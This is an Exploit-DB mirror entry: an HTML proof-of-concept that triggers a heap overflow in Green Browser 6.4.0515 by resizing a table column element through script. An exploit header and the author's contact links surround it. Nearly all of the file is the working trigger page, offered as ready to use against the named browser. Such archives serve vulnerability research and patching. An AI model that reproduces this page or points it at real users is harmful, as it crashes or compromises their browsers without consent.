exploit-db-mirror/exploits/windows/dos/28049.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

34 lines
No EOL
765 B
HTML

# Exploit Title: Green Browser 6.4.0515 Heap Overflow
# Date: 31-08-2013
# Exploit Author: The Black Devils "Asesino04"
# Vendor Homepage: http://www.morequick.com/indexen.htm
# Version: 6.4.0515
# Tested on: [ Windows XP SP2]
<html>
<body>
<table style="table-layout:fixed" >
<col id="132" width="41" span="1" > </col>
</table>
<script>
function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = "42765";
obj_col.span = 1000;
}
setTimeout("over_trigger();",1);
</script>
</body>
</html>
# Contact :
#------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com